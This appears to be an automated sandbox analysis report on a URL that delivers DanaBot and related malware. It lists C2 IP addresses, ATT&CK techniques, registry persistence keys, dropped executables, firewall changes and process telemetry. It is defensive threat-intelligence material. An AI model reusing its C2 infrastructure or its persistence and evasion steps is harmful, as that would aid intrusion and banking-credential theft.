danabot | hxxp://Youareanidiot[.]cc

Resubmissions

31-03-2024 14:38

240331-rzx63sdf2v 10

31-03-2024 14:35

31-03-2024 14:31

31-03-2024 14:27

31-03-2024 14:14

Analysis

max time kernel
547s
max time network
552s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
31-03-2024 14:38

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

http://Youareanidiot.cc

Score

10^/10

danabot banker botnet evasion persistence trojan

Malware Config

Extracted

Family

danabot

51.178.195.151

51.222.39.81

149.255.35.125

38.68.50.179

51.77.7.204

rsa_pubkey.plain

Signatures

Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
trojan banker danabot

Danabot x86 payload 1 IoCs

Detection of Danabot x86 payload, mapped in memory during the execution of its loader.

botnet

Processes:

resource	yara_rule
C:\Users\Admin\DOWNLO~1\DanaBot.dll	family_danabot

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 10 IoCs

Processes:

rundll32.exe

flow	pid	process
115	2652	rundll32.exe
122	2652	rundll32.exe
123	2652	rundll32.exe
124	2652	rundll32.exe
132	2652	rundll32.exe
134	2652	rundll32.exe
135	2652	rundll32.exe
137	2652	rundll32.exe
138	2652	rundll32.exe
139	2652	rundll32.exe

Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

2416 netsh.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4800 attrib.exe

pid	process
2416	netsh.exe

pid	process
4800	attrib.exe

Sets service image path in registry 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

mssql.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\oyjvzhkdcqneolri\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\oyjvzhkdcqneolri.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\xiexpjddohabzwcys\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\xiexpjddohabzwcys.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\twzulkaqbgdpwf\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\twzulkaqbgdpwf.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\lyjirqwwdnrgimwnw\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\lyjirqwwdnrgimwnw.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssqlaq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\pfzswpzjrkmlvhjhq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\pfzswpzjrkmlvhjhq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ijznokcjrjjvpgibh\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\ijznokcjrjjvpgibh.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\jscommujdaxszrl\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\jscommujdaxszrl.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mumpsjewejozsqerl\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mumpsjewejozsqerl.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\krudtiirnubyuimo\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\krudtiirnubyuimo.sys"	mssql.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Dharma.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation Dharma.exe
Executes dropped EXE 10 IoCs

Processes:

DanaBot.exeDanaBot.exeAmus.exeAmus.exeAmus.exeDharma.exenc123.exemssql.exemssql2.exeSearchHost.exe

pid process

3672 DanaBot.exe
3976 DanaBot.exe
4856 Amus.exe
4888 Amus.exe
4036 Amus.exe
2044 Dharma.exe
4020 nc123.exe
2824 mssql.exe
944 mssql2.exe
3996 SearchHost.exe
Loads dropped DLL 2 IoCs

Processes:

regsvr32.exerundll32.exe

pid process

2416 regsvr32.exe
2652 rundll32.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation	Dharma.exe

pid	process
3672	DanaBot.exe
3976	DanaBot.exe
4856	Amus.exe
4888	Amus.exe
4036	Amus.exe
2044	Dharma.exe
4020	nc123.exe
2824	mssql.exe
944	mssql2.exe
3996	SearchHost.exe

pid	process
2416	regsvr32.exe
2652	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Amus.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microzoft_Ofiz = "C:\\Windows\\KdzEregli.exe"	Amus.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

SearchHost.exe

description ioc process

File opened (read-only) \??\D: SearchHost.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

110 raw.githubusercontent.com
111 raw.githubusercontent.com

description	ioc	process
File opened (read-only)	\??\D:	SearchHost.exe

flow	ioc
110	raw.githubusercontent.com
111	raw.githubusercontent.com

Drops file in Windows directory 20 IoCs

Processes:

Amus.exe

description	ioc	process
File opened for modification	C:\Windows\My_Pictures.exe	Amus.exe
File created	C:\Windows\Cekirge.exe	Amus.exe
File opened for modification	C:\Windows\Cekirge.exe	Amus.exe
File opened for modification	C:\Windows\Ankara.exe	Amus.exe
File created	C:\Windows\Anti_Virus.exe	Amus.exe
File created	C:\Windows\Messenger.exe	Amus.exe
File opened for modification	C:\Windows\Messenger.exe	Amus.exe
File opened for modification	C:\Windows\Meydanbasi.exe	Amus.exe
File opened for modification	C:\Windows\Pire.exe	Amus.exe
File opened for modification	C:\Windows\Anti_Virus.exe	Amus.exe
File created	C:\Windows\KdzEregli.exe	Amus.exe
File opened for modification	C:\Windows\KdzEregli.exe	Amus.exe
File created	C:\Windows\Meydanbasi.exe	Amus.exe
File created	C:\Windows\Adapazari.exe	Amus.exe
File created	C:\Windows\My_Pictures.exe	Amus.exe
File created	C:\Windows\Pide.exe	Amus.exe
File opened for modification	C:\Windows\Pide.exe	Amus.exe
File created	C:\Windows\Pire.exe	Amus.exe
File created	C:\Windows\Ankara.exe	Amus.exe
File opened for modification	C:\Windows\Adapazari.exe	Amus.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

2876 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

3632 3672 WerFault.exe DanaBot.exe
1792 3976 WerFault.exe DanaBot.exe
3640 2652 WerFault.exe rundll32.exe

pid	process
2876	sc.exe

pid	pid_target	process	target process
3632	3672	WerFault.exe	DanaBot.exe
1792	3976	WerFault.exe	DanaBot.exe
3640	2652	WerFault.exe	rundll32.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "30"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe

Modifies registry class 5 IoCs

Processes:

msedge.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-609813121-2907144057-1731107329-1000\{ED2CA661-FAA7-4E71-82BF-06A788E78D08}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000_Classes\Local Settings	OpenWith.exe

NTFS ADS 7 IoCs

Processes:

msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 549588.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 464505.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 388950.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 753627.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 475851.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 431318.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 478829.crdownload:SmartScreen	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exe

pid	process
1512	msedge.exe
1512	msedge.exe
1456	msedge.exe
1456	msedge.exe
2016	identity_helper.exe
2016	identity_helper.exe
1716	msedge.exe
1716	msedge.exe
4056	msedge.exe
4056	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
216	msedge.exe
216	msedge.exe
1076	msedge.exe
1076	msedge.exe

Suspicious behavior: LoadsDriver 32 IoCs

Processes:

mssql.exe

pid	process
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe
2824	mssql.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs

Processes:

msedge.exe

pid	process
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

AUDIODG.EXEmssql.exemssql2.exeWMIC.exe

description	pid	process
Token: 33	4640	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4640	AUDIODG.EXE
Token: SeDebugPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeLoadDriverPrivilege	2824	mssql.exe
Token: SeDebugPrivilege	944	mssql2.exe
Token: SeIncreaseQuotaPrivilege	4300	WMIC.exe
Token: SeSecurityPrivilege	4300	WMIC.exe
Token: SeTakeOwnershipPrivilege	4300	WMIC.exe
Token: SeLoadDriverPrivilege	4300	WMIC.exe
Token: SeSystemProfilePrivilege	4300	WMIC.exe
Token: SeSystemtimePrivilege	4300	WMIC.exe
Token: SeProfSingleProcessPrivilege	4300	WMIC.exe
Token: SeIncBasePriorityPrivilege	4300	WMIC.exe
Token: SeCreatePagefilePrivilege	4300	WMIC.exe
Token: SeBackupPrivilege	4300	WMIC.exe
Token: SeRestorePrivilege	4300	WMIC.exe
Token: SeShutdownPrivilege	4300	WMIC.exe
Token: SeDebugPrivilege	4300	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4300	WMIC.exe
Token: SeRemoteShutdownPrivilege	4300	WMIC.exe
Token: SeUndockPrivilege	4300	WMIC.exe
Token: SeManageVolumePrivilege	4300	WMIC.exe
Token: 33	4300	WMIC.exe
Token: 34	4300	WMIC.exe
Token: 35	4300	WMIC.exe
Token: 36	4300	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4300	WMIC.exe
Token: SeSecurityPrivilege	4300	WMIC.exe
Token: SeTakeOwnershipPrivilege	4300	WMIC.exe
Token: SeLoadDriverPrivilege	4300	WMIC.exe
Token: SeSystemProfilePrivilege	4300	WMIC.exe
Token: SeSystemtimePrivilege	4300	WMIC.exe
Token: SeProfSingleProcessPrivilege	4300	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe

Suspicious use of SendNotifyMessage 25 IoCs

Processes:

msedge.exeSearchHost.exe

pid	process
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
1456	msedge.exe
3996	SearchHost.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeAmus.exeAmus.exeAmus.exemssql.exemssql2.exeSearchHost.exeLogonUI.exe

pid	process
4448	OpenWith.exe
1856	OpenWith.exe
2828	OpenWith.exe
4048	OpenWith.exe
4856	Amus.exe
4888	Amus.exe
4036	Amus.exe
2824	mssql.exe
944	mssql2.exe
3996	SearchHost.exe
2824	mssql.exe
940	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 1456 wrote to memory of 1492	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 1492	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 4472	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 1512	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 1512	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe
PID 1456 wrote to memory of 2684	1456	msedge.exe	msedge.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4800 attrib.exe

pid	process
4800	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://Youareanidiot.cc
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1456

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbe83346f8,0x7ffbe8334708,0x7ffbe8334718
2⤵
PID:1492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
2⤵
PID:4472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
2⤵
PID:2684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
2⤵
PID:4280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
2⤵
PID:1924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
2⤵
PID:1064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,9098753884941545855,14367734878739936447,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
2⤵
PID:5100

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
